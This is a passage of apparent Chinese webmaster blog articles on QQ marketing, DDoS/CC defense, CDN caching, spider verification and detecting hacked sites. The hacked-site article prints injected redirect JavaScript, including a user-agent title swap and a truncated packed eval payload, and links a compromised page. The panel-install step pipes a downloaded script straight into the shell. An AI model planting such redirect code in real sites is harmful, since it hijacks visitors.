分享;如果是自己主动发言,可以发布比较新鲜的与群相关的信息,如有链接,在链接前说明主题内容,也可以在群共享、群图片中分享一些群成员感兴趣的行业、职业、业务方面的文章、图片等,如果公司有比较重要的活动,除可通过聊天发言宣布外,群共享、群图片,甚至群邮件都是很好的传播方式,如确实对群成员有益及非常需要的,可联系群主发布群公告,这样宣传的效果就更好,每一次发言,每一次分享,你的群名片都会出现一次,这无疑是很好的宣传展示机会,所以好好利用这种机会吧,它很可能给你带来业务 在群里发言虽然理论上大家都可以看到,但有时信息太多就淹没了。这就要注意群成员间直接的沟通。遇到与自己业务相关的潜在客户、供应商、行家高手、热心且人脉广的群成员等最好的方式是申请加为好友,然后利用私下点对点的沟通、群里组织的活动、甚至跟对方私下约会等方式进一步互相认识,有机会的有 缘的还会成为真正的朋友,即使你只交到了那么一两位朋友都可能比你加十个、几十个群,发几千次言有价值的。 QQ设置 QQ资料的完善 1)头像设置:无论是在虚拟网络还是现实生活中以貌取人都很常见, QQ头像是我们给别人的第一印象,最好是使用最上相真人头像,提高我们的印象分和可信度降。 2)名字设置:可以用真实的名字,这样容易建立信任感;或者好听易记的富有个性的。 3)签名设置:可以直接点明自己的公司是干什么的,有什么产品,产品功效是什么,还有公司网站链接 。 4)状态设置:添加自己的电话以及网络连接。 5)其他资料:可以尽可能的翔实一些,比如年龄、职业、住址、邮箱等给人一种真实的感觉,空间、签名、相册也时常更新下。 QQ好友 可以加现有客户为好友,建立客户档案分组,维护好老客户;同时主动出击创造新客户,在查找里定义一些关键字等条件搜索自己的目标客户。 QQ空间 1.QQ日志 根据自己的行业经验以及理论知识撰写一些精彩的软文日志分享给QQ好友,在分享的同时做好推广宣传,质量上乘肯定会被转载,再者也需要多分享好的文章,图片,视频 。 2.QQ相册 大家想想自己在在进入一个陌生人的空间后最想做的是什么?当然是进入这个人的相册,然后看一下他真实的一面。靠着大家普遍的好奇心,我们可以在自己的相册中加上几个关于我们公司或是产品的图片,比如放上几张乳清蛋白质粉或大豆蛋白质粉的照片,然后上面打上我们自然拥有的LOGO,标题再写的吸引人一些,给我们的宣传做出贡献。 3.QQ留言 平常我们可以加上一些名人的QQ,或是受关注较大的QQ,然后在他们发表容易引起争论的文章的时候,果断留言,并且尽早留言,使自己的留言能够做到“沙发”的位置,如此一来我们就能借助他人高流量的空间,然后间接的推广一下自己的网站,这可比在外面那些论坛留言,效果强多了。 #### 如何有效防御DDoS/CC攻击?从流量清洗到高防服务的实战指南 防止DDoS(分布式拒绝服务攻击)和CC(Challenge Collapsar,一种应用层DDoS攻击)攻击需要结合技术手段、网络架构优化和第三方服务支持。以下是一些关键措施: 一、基础防护策略 使用高防网络服务 选择支持DDoS防护的云服务商(如阿里云、腾讯云、华为云、百度云等),这些服务提供流量清洗和黑洞路由功能,可过滤恶意流量。 通过CDN(内容分发网络)分散攻击流量,隐藏源服务器IP。 部署Web应用防火墙(WAF) 针对CC攻击(应用层攻击),使用WAF识别恶意请求(如高频请求、异常User-Agent、恶意爬虫),并设置规则拦截。 配置频率限制(Rate Limiting),例如限制单个IP的请求频率或并发连接数。 优化服务器架构 负载均衡:通过多台服务器分担流量压力。 冗余与分布式部署:跨机房、跨区域部署服务,避免单点故障。 弹性带宽:预留足够的带宽资源应对突发流量。 二、技术防护措施 流量清洗与黑洞路由 当检测到攻击时,将流量导向清洗中心,过滤异常流量后再转发到服务器。 极端情况下启用“黑洞路由”,直接丢弃攻击流量(需权衡业务中断风险)。 限制连接与请求 SYN Cookie:防止TCP半连接耗尽资源。 调整TCP/IP参数:优化net.ipv4.tcp_syncookies、net.core.somaxconn等内核参数。 Nginx/Apache配置: 限制单个IP的并发连接数(如Nginx的limit_conn模块)。 设置请求频率阈值(如Nginx的limit_req模块)。 验证码与人机验证 对异常流量触发验证码(如Google reCAPTCHA),区分真实用户与机器人。 IP黑名单与动态封禁 实时监控日志,自动封禁高频请求的IP。 结合威胁情报(如已知攻击IP库),提前拦截恶意来源。 三、应用层防护(针对CC攻击) 识别攻击特征 分析日志,定位攻击模式(如特定URL、Header、Cookie字段)。 使用工具(如ELK、Wireshark)监控异常请求。 动态资源保护 对数据库查询、API接口等高消耗操作增加访问限制。 静态资源与动态资源分离,减少攻击面。 会话验证机制 强制要求完成一次合法会话(如登录)后才能访问关键页面。 四、应急响应与监控 实时监控与告警 部署流量监控工具(如Zabbix、Prometheus),设置流量阈值告警。 使用云服务商的DDoS防护控制台实时查看攻击状态。 制定应急预案 预先规划攻击发生时的操作流程(如切换IP、启用备用服务器)。 与ISP(互联网服务提供商)建立快速响应通道。 日志分析与溯源 保留完整日志,用于攻击后分析和法律追责。 五、推荐工具与服务 免费/开源工具 iptables(Nginx免费防火墙工具)。 Fail2Ban:自动封禁恶意IP。 ModSecurity(WAF规则引擎)。 商业服务 高防IP、高防服务器:专为超大流量攻击设计。 高防CDN:分布式高防CDN服务,专业大流量CC攻击防护。 京东云星盾 安全加速 SCDN 高防CDN 隐藏IP ddos防御 CC攻击防御[出售] ¥720 ¥900 库存:9.9k 已售:103 人气:4.2 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 六、注意事项 隐藏服务器真实IP:避免通过DNS记录、邮件服务器等泄露源站IP。 定期演练:模拟攻击场景,测试防护策略的有效性。 法律手段:对持续攻击行为,通过法律途径追究责任。 通过以上多层防护策略,可显著降低DDoS/CC攻击的影响。对于大型攻击(超过自身带宽能力),建议依赖专业的高防服务。 #### 如何本地电脑ping域名解析IP 要说网站建设最频繁的操作是什么,非ping域名莫属了。无论我们用的是虚拟主机还是云服务器免不了测下速度,经常用站长之家的超级ping ,ping下域名,看下响应速度如何。如果速度很快,无形中提高了满足感。当然站长之家超级ping功能也常出问题,只能作为参考对象,今天我们来说的本地如何ping的,本地ping得出的结果其实更具参考性,毕竟自己独享的电脑宽带共比网上共享的宽带测得精准。一、通过电脑“开始”菜单进入。点击“开始”菜单,从打开的菜单中依次点击“所有程序”->“附件”->“运行”来打开“运行”窗口。也可以按按键盘快捷组合键(Win+R)就可以打开“运行窗口。二、在运行窗口输入CMD 确认三、输入 ping 你的域名 按回车键确认这样一看,是不是感觉网站速度快好多,时间越短,表示网站响应速度越快。ping的时候相同,表示本地网络访问空间网络稳定。 #### 如何查看京东云星盾IP是否被防火墙拦截 最近,有位接放入京东云星盾的站长向主机吧反馈,网站经常时不时出现520的情况。 经主机吧了解后,这是京东云星盾回源节点无法正常访问源服务器所致。 一般是因为源服务器防火墙拦截了,那么要怎么看出是不是源服务器防火墙拦截了。 其实很简单,进入京东云星盾管理,日志分析 点击状态码,查看,如果显示请求出现多个520的状态的,那说明源服务器确实有拦截的情况。 我们需要做的就是把源服务器防火墙卸载了,或者把京东云星盾的回源IP段加白。《京东云星盾CDN IP段白名单》 #### 如何查看域名是否已经备案 网站备案是国内强制性管理的一项措施,只有用国内空间的网站都必须备案。然而很多新手站长并不知道如何确认域名是否已经备案了,今天主机吧来教大家如何查询网站备案。 一、首先我们登陆工信部网站www.miitbeian.gov.cn,点右下角公共查询 二、 备案信息查询 三、点域名,输入顶级域名,注意不能带http和www,只输入顶级根域名即可 四、 输入域名再输入正确的验证码,点提交,即可查询域名备案信息 #### 如何查看域名是否被暂停解析 经常有站长遇到过网站被暂停解析的情况,所谓暂停解析其实就是域名商因为某些原因把域名暂停解析了,这个时候无论你域名用哪的DNS都是无法正常访问的。 国内域名注册商经常这种操作,比如新网、阿里云都常有,前段时间国内代码托管网站码云Gitee.com被阿里云停止域名解析,所以平时我们网站要注意维护好内容,暂停你网站的不只是服务器商,域名商也可以。 如果你网站突然哪天不能访问了,域名各地ping不出IP,那极有可能是域名商暂停了你的域名。检测方法很简单: 进入阿里云的whois查询网址 https://whois.aliyun.com/ 查询域名,当域名状态显示暂停时,即表示域名商已经暂停了你的域名解析。 这个时候我们要解决的话,只能咨询域名商具体情况,然后再做处理。有些域名一开始注册就是被暂停的,因为国内域名注册是需要实名认证后才可以正常解析的。 #### 如何查看域名百度云加速分配IP节点 最近有客户咨询如何查看域名在百度云加速上分配的具体IP节点多少,在哪里可以看到? 今天我们来说下,百度云加速后台有查看节点功能,藏得比较隐秘,估计大家看不到。 在查看报表下拉-节点地图可以看到。 如果您的服务器安装了安全软件或者开启了防火墙服务(例如:安全狗、冰盾、云盾、Iptables等),请将云加速IP段加入白名单 #### 如何查看已经接入的京东云星盾的网站资源是否缓存生效 网站接入京东云星盾SCDN后,不知道网站内容是否被CDN缓存,怎么办? 今天主机吧来教大家,如何查看是否生效。 首先需要说明一下,京东云星盾的默认缓存规则, 京东云星盾安全加速SCDN 通过文件扩展名类型进行资源缓存,它支持自动缓存包含某些文件扩展名的文件。 目前安全加速SCDN支持的静态资源缓存内容如下: bmp、ejs、jpeg、pdf、ps、ttf class、eot、jpg、pict、svg、webp css、eps、js、pls、svgz、woff csv、gif、mid、png、swf、woff2 doc、ico、midi、ppt、tif、xls docx、jar、otf、pptx、tiff、xlsx 注:SCDN默认不缓存HTML等文件类型,如需缓存特定内容,需通过页面规则功能设置需要缓存的URL。详细教程 1.设置缓存后,我们用Edge打开网页,按F12打开发者模式,并点击网络 2.找到需要查看的是否缓存的链接,比如我们设置了该目录缓存,那么点该目录,然后查看响应标头。 响应标头Cf-Cache-Status: HIT 表示已经缓存。 HIT 在安全加速的缓存中找到资源 MISS 未在安全加速缓存中找到资源,从源Web服务器获取 EXPIRED 在安全加速缓存中找到资源但已过期,从源Web服务器获取 STALE 资源通过缓存提供,但已经过期,安全加速无法获取源站检索更新后的资源 BYPASS 源站通过设置为no-cache、private或max-age=0的Cache-Control标头指示源站绕过缓存 REWALIDATED 资源通过缓存提供,但已过时。已通过 If-Modified-Since 标头或 If-None-Match 标头重新验证资源 UPDATING 资源通过缓存提供,但已过期。资源目前正在由源Web服务器进行更新。 #### 如何查看网站是否被人隐藏彩票跳转 最近有一个客户向主机吧反馈,网站收录大幅下降,流量也降了不少,怀疑是被人挂马了,但是又不知道如何检查,怎么办呢? 主机吧根本自己的经验教大家一个方法,可以很容易的检查到网站是否被人黑了。 方法很简单: 打开百度,输入:site:你的域名 彩票   搜索 以上是这边的一个客户,这样一搜索,很明显,是被人挂黑链了,跳转彩票网站。找到地址后,解决办法只能从程序方面下手了,如果你不懂如何处理,还是找你的程序开发人员搞定了,我们需要做的是删除黑链,并修复程序漏洞,以免下次再被黑客利用。   #### 如何查看网站是否被挂马 最近有一客户反馈网站似乎被挂马,所以今天我们来谈谈如何查看网站是否被挂马? 首先打开网站,右击查看网页源代码 然后查看代码,我们发现网页的标题已经被更改,并且有针对百度进入的JS跳转代码 <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XXXX"}</script> <script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while 然后我们再通过百度搜索域名查看: 网站收录内容已经变成赌球网站了,点击进入后更是直接跳转赌博网站。 确认网站程序被挂马无疑。 #### 如何查看网站资源是否已被百度云加速节点缓存命中 之前有发一篇文章内容如何查看百度云加速是否命中缓存,不过由于百度云加速现在更换了新系统,响应头变更了,所以今天我们了教大家新系统如何查看命中。 具体方法如下: 1、使用谷歌chrome或者火狐浏览器,在浏览器界面,按F12,打开浏览器调试界面,然后选择“网络”或者是“Network”(一般浏览器均支持该方法);     2、访问该网站的页面或链接(如主页,子页面),并在浏览器中的Network选项卡中查看显示的信息。主要查看响应头信息中的“yjs-cachestatus”字段; 如显示“MISS”,说明没有命中CDN缓存,资源请求回源;如显示“HIT”,是命中了CDN缓存;如显示其他内容或不显示该字段,表明该类型资源可能未设置缓存或不支持;或缓存已过期。 如果你想全站缓存,可参考该文章传送门 #### 如何查询IP是不是百度蜘蛛 经常听到开发者问,百度蜘蛛是什么?最近百度蜘蛛来的太频繁服务器抓爆了!最近百度蜘蛛都不来了怎么办?还有很多站点想得到百度蜘蛛的IP段,想把IP加入白名单,但IP地址范围动态变化不固定,我们无法对外公布。 那么如何才能识别正确的百度蜘蛛呢?今日干货带你轻松两步正确识别百度蜘蛛:   一、查看UA信息 如果UA信息不对,可以直接判断为非百度搜索的蜘蛛。目前UA分为移动、PC、和小程序三个应用场景,这三个渠道UA分别如下: 移动UA: Mozilla/5.0(Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko)Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html) 或 Mozilla/5.0 (iPhone;CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko)Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0;+http://www.baidu.com/search/spider.html) PC UA: Mozilla/5.0(compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 或 Mozilla/5.0(compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 小程序UA: Mozilla/5.0 (iPhone;CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko)Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0;Smartapp; +http://www.baidu.com/search/spider.html)   二、双向DNS解析认证 第一步:DNS反查IP 开发者通过对日志中访问服务器的IP地址运行反向DNS查找,判断某只spider是否来自百度搜索引擎,Baiduspider的hostname以*.baidu.com或*.baidu.jp 的格式命名,非*.baidu.com或*.baidu.jp即为冒充。 根据平台不同验证方法不同,如linux/windows/os三种平台下的验证方法分别如下:   1).在linux平台下,您可以使用host ip命令反解ip来判断是否来自Baiduspider的抓取。   2).在windows平台或者IBM OS/2平台下,您可以使用nslookup ip命令反解ip来 判断是否来自Baiduspider的抓取。打开命令处理器 输入nslookup xxx.xxx.xxx.xxx(IP地址)就能解析ip,来判断是否来自Baiduspider的抓取。   3).在macos平台下,您可以使用dig命令反解ip来判断是否来自Baiduspider的抓取。打开命令处理器输入dig -x xxx.xxx.xxx.xxx(IP地址)就能解析ip,来判断是否来自Baiduspider的抓取。 第二步:对域名运行正向DNS查找 对第一步中通过命令检索到的域名运行正向DNS查找,验证该域名与您日志中访问服务器的原始IP地址是否一致,IP地址一致可确认spider来自百度搜索引擎,IP地址不一致即为冒充。 示例1: > host 111.206.198.69 69.198.206.111. in-addr.arpa domain name pointer baiduspider-111-206-198-69.crawl.baidu.com. > host baiduspider-111-206-198-69.crawl.baidu.com baiduspider-111-206-198-69.crawl.baidu.com has address 111.206.198.69 如果以上都不懂,那么直接用站长之家的真假蜘蛛工具查询,地址 http://stool.chinaz.com/baiduspider 输入IP 查看分析即可知道是不是百度蜘蛛的IP了。 #### 如何查询域名接入百度云加速DNS是否生效 最近有位客户联系上主机吧,说是DNS解析至百度云加速的DNS后,一直不生效,ping也全国各地超时。经查询发现是客户的域名DNS解析慢所致,所以今天主机吧来教大家如何查询自己本地的DNS是否生效了百度的记录。 windows系统用户:电脑中点“开始” “运行” 输入“CMD” 回车,或者 windows键+R, 接着出现一个ms-dos的黑色界面,如下图: 查询域名NS记录,在黑色界面输入nslookup (空格) -qt=ns (空格) 域名,将会出现记录值,如下图 如果DNS记录出现 n3060.ns.yunjiasu.com  n333.ns.yunjiasu.com 这样的,就表示你的本地电脑DNS已经生效百度的DNS记录了,如果没有则说明你的域名DNS还是原来的记录,这个时候只能等生效了。 #### 如何查询域名是否被墙? 最近有站长买到一个被墙的域名,导致解析海外服务器无法访问,所以我们在购买域名的时候最好是先检测下域名的是否被墙。 那么如何检测呢?这里主机吧教大家一个方法,即本地hosts域名海外服务器IP,如果能正常访问的,那说明是没有被墙的,如果显示超时的,那说明被墙了。   https://zhujib.com/qiangzhiyumingjiexiip.html   如果觉得麻烦可以用站长之家的安全检查工具进行检查,地址:http://tool.chinaz.com/webscan #### 如何检查使用百度云加速后的源服务器IP是否暴露了 昨天遇到一个客户,网站被大量CC攻击了,导致网站一直502,百度云加速开启强力防护后依然没有效果。 经过我们查看百度云加速报表后发现通过域名过来的请求并没有多少,而且大多都是被拦截了的,所以我们断定网站的源服务器IP可能是泄漏了,导致对方直接绕过百度云加速防御进行攻击了。 如何查看是不是暴露了呢? 我们只要查看网站请求日志就知道了。以下以宝塔后台为例: 进入安全 点击进入web日志 下载 (你的域名.log)文件到本地 用记事本打开 观察请求IP,看是否来自百度云加速IP段节点,从上可以看出,以上请求均不是百度云加速的节点,则说明对方并没有通过百度云加速请求流入,因为凡通过百度云加速过来的请求,IP都是显示百度云加速IP的,由此可见该网站的IP已经泄漏了,被客户直接hosts源服务器IP攻击了。 解决办法只有一个,那就是给服务器更换一个新的IP,然后用百度云加速隐藏起来即可。 #### 如何检查网站是CDN节点故障还是源服务器问题 网站使用CDN后,好处是访问速度快了,而且安全、稳定很多,如果网站流量大的话还可以给源服务器减少带宽,,省不少钱。不过坏处也有,就是如果网站访问出问题了,想要判断是节点故障还是服务器故障,是一件很麻烦的事,比如有一些客户因为种种原因接入百度云加速后,访问经常出现522,很多人直接认为是节点原因,其实以主机吧多年来使用百度云加速的经验90%都是因为客户源服务器问题。今天我们来教大家如果判断是节点故障还是源服务器故障。 我们可以利用修改本地电脑hosts文件,达到强制解析回源的目地,来判断服务器是否故障了。 首先打开我的电脑:C:\WINDOWS\system32\drivers\etc 找到hosts文件 右击用记事本打开,源服务器IP+空格+域名,比如主机吧源服务器IP183.2.210.84,那么输入183.2.210.84 zhujib.com 点文件保存即可,如果提示你保存不了的话,那说明你这个文件需要管理员才可以操作,自己下载Notepad++软件,再重新开hosts文件,输入保存吧。 修改完成后我们再通过本地ping域名的方式查看,强制解析是否生效了。 以上说明生效了,那么说明我们本地电脑访问网址已经不通过CDN节点了,我们可以清空浏览器缓存,重新访问网址看下,访问是否正常呢? 如果访问正常那么 原因一:CDN节点出问题了,联系CDN服务商查看; 原因二:你的服务器防火墙把CDN的节点IP给拦截了,解决方法就是要么把服务器防火墙关了,要么把CDN节点IP段全部加入防火墙白名单。 如果不正常,那么联系服务器商解决,也可以直接重启服务器,等待服务器重启正常。 如果服务器刚重启一会正常的,过一会就不行了,请检查下服务器CPU 内存 宽带是否满了,如果有一样满了说明可能网站被CC攻击了,使用百度云加速安全功能-ADS-CC防护强力防护即可解决。   #### 如何检查网站是否封禁百度蜘蛛IP(如何解禁百度蜘蛛) 近期收到一些开发者反馈,为什么网站或智能小程序资源的内容非常优质,但是没有查询到百度蜘蛛抓取记录,或在百度搜索中没有得到收录和展现? 有可能是部分网站或智能小程序存在封禁百度蜘蛛的情况,导致百度蜘蛛无法正常抓取,所以无法在百度搜索中正常收录和展现。 常见的封禁行为包括robots封禁、封禁百度UA、封禁百度IP等。 如何验证网站和智能小程序是否存在封禁百度蜘蛛的情况?快来按照以下方法自查吧~ 1、自查robots.txt文件 首先, 开发者们先查看robots.txt文件,是否存在封禁记录。一般robots.txt文件放置在网站根目录下~ 【建议方案】如果存在robots封禁的情况,请开发者们及时修改或者删除robots.txt文件。 关于更多robots文件的说明请扫描二维码阅读~ 2、自查是否封禁百度UA 如果开发者们自查robots.txt文件无异常,可以进一步排查是否存在封禁百度UA情况。 1 执行代码进行自查 执行以下命令进行排查: curl--head--user-agent'Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)'--request GET 'xxxxxxx' xxxxxxx为网站域名,如:http://www.abc.com 注意:如果站点正常,不存在封禁百度UA的情况,则其返回码是200,如出现其他返回码为异常。 2 变更浏览器进行UA验证 通过观察站点资源在其他浏览器是否得到正常的抓取和收录,来判断网站是否有封禁百度UA的情况。 【建议方案】查看网站反爬虫策略,进行策略调整,解除百度UA封禁;或者针对百度UA添加策略白名单。 3、自查是否存在IP封禁 如果以上验证均无异常,开发者们则可以排查是否存在IP封禁的情况。 常见的IP封禁,源自网站的防火墙系统配置,需要查看防火墙配置系统后台,检查是否存在百度蜘蛛的IP级别封禁措施。 【建议方案】查看网站反爬虫策略,进行策略调整,解除百度IP封禁。 #### 如何检测DDOS攻击 随着互联网的普及,网络攻击也日益猖獗。其中,DDoS(分布式拒绝服务)攻击是一种常见的网络攻击方式,它通过利用大量计算机系统同时向目标服务器发送请求,使其无法正常提供服务,从而达到攻击目的。如果一个网站、应用程序或服务器成为DDoS攻击的目标,那么它将面临瘫痪的风险,甚至可能导致业务中断、用户流失等问题。因此,如何检测DDoS攻击成为了企业和个人必须面对的问题。 以下是一些检测DDoS攻击的方法: 使用监测工具 可以使用专业的监测工具来检测DDoS攻击。这些工具可以实时监测网络流量,发现异常流量并采取相应的措施。常用的监测工具包括Nagios、Zabbix、PRTG等。此外,还可以使用云安全服务商提供的DDoS防护服务,这些服务商通常会提供详细的报告和警报,帮助您及时发现并应对DDoS攻击。 检查网络流量 可以通过检查网络流量来判断是否存在DDoS攻击。在进行检查时,应该关注以下几个方面: 带宽使用率:如果某个时间段内带宽使用率突然增加,可能是因为存在DDoS攻击。 IP地址:如果某个IP地址在短时间内发起了大量的请求,可能是因为存在DDoS攻击。 数据包大小:如果某个时间段内数据包大小明显增加,可能是因为存在DDoS攻击。 检查日志文件 可以检查服务器日志文件来了解是否存在DDoS攻击。在进行检查时,应该关注以下几个方面: 访问频率:如果某个IP地址在短时间内发起了大量的访问请求,可能是因为存在DDoS攻击。 请求类型:如果某个IP地址发起的请求主要是DNS查询、HTTP请求等类型的请求,可能是因为存在DDoS攻击。 错误信息:如果日志文件中出现了错误信息,可能是因为存在DDoS攻击。 需要注意的是,以上方法只是初步的检测方法,如果确认存在DDoS攻击,应该立即采取相应的措施。此外,建议定期进行DDoS攻击的演练,以便及时发现并应对潜在的攻击威胁。 #### 如何模拟百度蜘蛛访问网页 很多时候我们网站被挂马后自己都不知道,因为客户做得很隐秘,直接访问网页是正常的,而百度蜘蛛访问就不一样了,所以模拟百度蜘蛛访问网页是非常有必要的。今天我们来说下如何利用360浏览器模拟百度蜘蛛访问网页。 如您电脑还未安装360浏览器,可以在http://browser.360.cn/ 下载360浏览器安装后再进行设置。 1、打开360浏览器,点击右上角图标,然后点击“添加”。 2、在360应用市场搜索“魔变”。 3、搜到“魔变”应用后,点击安装。弹出框里点击添加。 4、安装后,在浏览器右上角会显示魔变图标,可以点击图标选择需要模拟的类型。 5、也可以在网页上点击鼠标右键进行设置,一般需要设置为搜索引擎--百度PC,来测试。 一般用在网站被挂马以后,直接访问没有问题,可以通过模拟百度或其他搜索引擎来访问,即可发现问题。比如下面的例子,直接访问没问题,使用模拟搜索引擎访问即可发现问题。 比如访问一个针对搜索引擎挂马的网页:http://www.zttoten.com/index.php?rmlbgh=cbfmcm&westauditpageinfo=1 [这个地址可能会会失效],这样就可以看到被挂马的情况。(默认情况下访问这个地址可能会跳转到网站首页。)   #### 如何测试网站使用百度云加速后的访问速度 百度云加速是百度旗下一款专为网站加速、安全防护、搜索引擎优化的产品。很多站长都喜欢用,有一些网站使用云加速后,会觉得慢,有些会觉得很快,具体原因涉及到配置问题,主机吧之前有专门发过《百度云加速深度优化》教程,这里就不多说了,我们今天来说如何测试网站速度。 首先我们可以本地ping,看下ping值是否符合要求 利用运行CMD,ping 测试域名结果如下: 从ping值上看,IP为58.211.137.87,这是百度云加速的一个节点IP,从数据中看,速度还是可以的,国内机房的IP除非省机房,否者基本都是50MS左右,香港机房更是达到了60MS左右,所以从数据上看,ping值还算正常。 然后我们用17ce专业测速网来测试下看下。 加速前 加速后 从测试结果上看,使用百度云加速后,部分地区访问速度得到很大提升,而且由些地区显示红色估计是测试节点被百度加速拦截导致的,这里我们不必在意。 如果你有网站接入百度云加速速度慢的,可以留言,主机吧可以免费帮你看的。   #### 如何测试网站访问速度 以下是一些测试网站访问速度的方法: 使用在线工具:有许多在线工具可以帮助你测试网站的访问速度,例如Google PageSpeed Insights、WebPageTest、Pingdom等。这些工具可以提供有关网站加载速度、响应时间、页面大小、HTTP请求数等方面的详细信息。 使用浏览器扩展:浏览器扩展可以帮助你测试网站的加载速度。例如,Chrome浏览器有许多扩展可用于测试网站速度,如PageLoad Time、WebPageTest、Speedtest等。 使用命令行工具:命令行工具如curl或wget也可以用于测试网站的访问速度。这些工具可以提供有关网站响应时间和页面大小的信息。 使用移动设备测试:考虑到大多数用户会使用移动设备访问网站,你也可以使用移动设备测试你的网站访问速度。你可以使用移动设备的浏览器或者安装一些测试应用程序,例如GTmetrix、Pingdom等。 总之,测试网站访问速度是非常重要的,因为它直接影响到用户的体验和网站的排名。你可以使用以上提到的方法来测试你的网站的访问速度,并根据测试结果来进行优化。 #### 如何给云服务器安装宝塔linux面板教程(小白篇) linux服务器由于没有图行操作,所以操作起来非常麻烦,所以一般我们建站都是给服务器装个建站面板,如wdcp、宝塔。而近几年宝塔面板是非常火的,主机吧的服务器也是装宝塔,因为简单,方便,不过很多小白还是不懂得如何安装宝塔,这里我们写了一篇小白操作教程,希望可以帮助大家,一般只要懂得登陆linux系统的,操作起来都不难。 1.用软件putty(这个软件自己可以百度搜下载) SSH登陆linux服务器 2.输入管理员帐号密码 linux管理员一般为root,输入后按回车键 再输入密码,需要注意的是linux输入密码是不显示的,所以输入正确后直接点回车键即可,也可以直接复制好密码,点鼠标右键,回车也可以,上图就是帐号密码登陆正确后的显示。 3.登陆完后我们接着安装宝塔,复制宝塔安装地址yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh,右击鼠标粘贴,回车 输入y回车键,确定安装 4.等待安装完成 安装完成后会显示宝塔的后台登陆地址、帐号、密码,我们只需要Ctrl+C复制粘贴保存下来即可。 #### 如何给网站加速访问 一、 网站程序中采用DIV+CSS这种模式,不用Table目前DIV+CSS是主流的编程语言,这与其体积小加载快的优点是密不可分的。主流的网站和CMS采用的也都是这种模式。因此建议大家也采用这种模式来编程,而不要采用原始的Table结构。Table结构不但管理不方便,网页体积也会变大,降低网站的加载速度。二、 采用Gzip技术对网页进行压缩采用Gzip技术对网页进行压缩是减少网页体积的一个很好的方式。一般情况下这是需要你的网站空间支持的,像我用的A5的合租主机,压缩率可以达到80%。网页体积小了,自然加载速度就快了。三、 减少CSS文件数量和体积在采用DIV+CSS过程中,CSS文件是非常重要的。如果在编写过程中有多个CSS文件,建议将多个CSS文件进行合并,这样可以加快网站加载速度。另外,可以采用专业的网页减肥软件对CSS文件进行减肥,以减少CSS文件的体积。四、使用CDN加速近一年CDN已经在我们个人站长中听的较多,也有很多朋友在使用。CDN的全称是Content Delivery Network,解释为内容分发网络。原理思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。也就是网站加速器,这个需要付费使用的,免费的不是太稳定。五、优化代码,减少臃肿结构如果我们使用较为流行的CMS这方便应该不会有臃肿的代码结构存在,但需要注意的是我们在制作或者选择网站模 板的时候也会存在不合理的结构。我们需要在写模板或者程序的时候使用较为简洁的程序框架,简洁有利于用户体验,也更利于搜索引擎蜘蛛的爬行和抓取。六、减少图片大小和数量我们尽量在上传网站图片的时候减少图片的大小和尺寸,可以在上传图片之前对图片进行压缩处理,图片适当尺码即可,不要过大。图片仅仅是网站的点缀,而不需要都是图文。同时,我们也尽量避免使用大量的视频或者音频内容。七、减少JavaScript脚本文件,尽量存放在一个文件中尽量外部调用JS代码,不要放在网页中,更不要远程调用外部的JS代码。例 如Google建议您加载在HEAD标签的分析。您也可以尝试结合的JavaScript和压缩他们更快地加载。有些时候我们在头部的CSS,JS代码太 多,导致中间内容部分加载太慢。所以尽量减少头部的代码。八、运用静态的HTML页面众所周知,ASP、PHP、JSP等顺序完成了网页信息的静态交互,运转起来确实十分方便,由于它们的数据交互性好,能很方便地存取、更改数据库的内容,但是这类顺序也有本人的缺陷,那就是它必需由效劳器先生成HTML页面,然后在"传送"给用户,多了一个步骤,必定会影响到网站的拜访速度,所以笔者建议,在新站开端的时分,在对本人网站的重要调查期内还是采用静态的HTML页面比拟保险。九、 将ASP、ASPX、PHP等文件的访问改为.js引用这在ASP、ASPX、PHP等程序设计时应该注意的,如果要在静态的HTML页面里嵌入动态的数据,而这些动态的数据是由ASP、PHP等程序来提供的话,会使用以下的语句引用:<script src="http://www.w3cschool.cc/network_index.php?data=1″></script>这样的话,每次有一个人访问你的网站,服务器就要执行并处理一次network_index.php文件,从数据库抽取相应的数据,再输出给网页显示,如果有几万个人同时访问,就要执行几万次,后果就可想而知。建议在这些程序中将数据动态生成到一个network_index.js文件中去,然后在首页通过<script src="http://www.w3cschool.cc/network_index.js"></script>这样的代码来引用该network_index.js文件。这样,数据显示的任务就交给客户端的浏览器去做,不会耗费服务器的资源,显示速度自然就很快;前者所花的时间几乎是后者的几倍! #### 如何给网站在百度搜索网址添加保障标志 相信很多站长同学都有注意到一些网站在百度搜索上,网址都显示保障标志 虽然百度说过这个标志并不能直接影响网站排名,但是有了这个标志的网址明显点击率更高,也间接增强了百度搜索排名,点击率高低确实是影响搜索排名的。 而且百度这个标志很良心的,免费提供申请,不收取任何费用。 申请地址https://baozhang.baidu.com/guarantee/bao 商家申请流程 经过身份认证的用户为企业申请保标,需提供企业营业执照、对公账户、展现保标网址及行业信息。提交申请后百度将在2-5个工作日给予审核意见。审核通过的网址将在搜索结果展现保标。 1)禁止申请行业:医疗、金融、棋牌游戏、商城、保健品等(查看禁止行业); 2)商家申请需提供如下资料:营业执照原件、企业对公账户、商家所属行业资质证明文件(查看资质要求); 3)商家同意在保障范围内,如发生假冒网站、欺诈用户、商家跑路等行为,商家承担全部赔偿责任;   #### 如何给网站开启百度云加速 这个问题比较小学生,不过还是很多人不知道怎么回事,比如今天主机吧就遇到一个 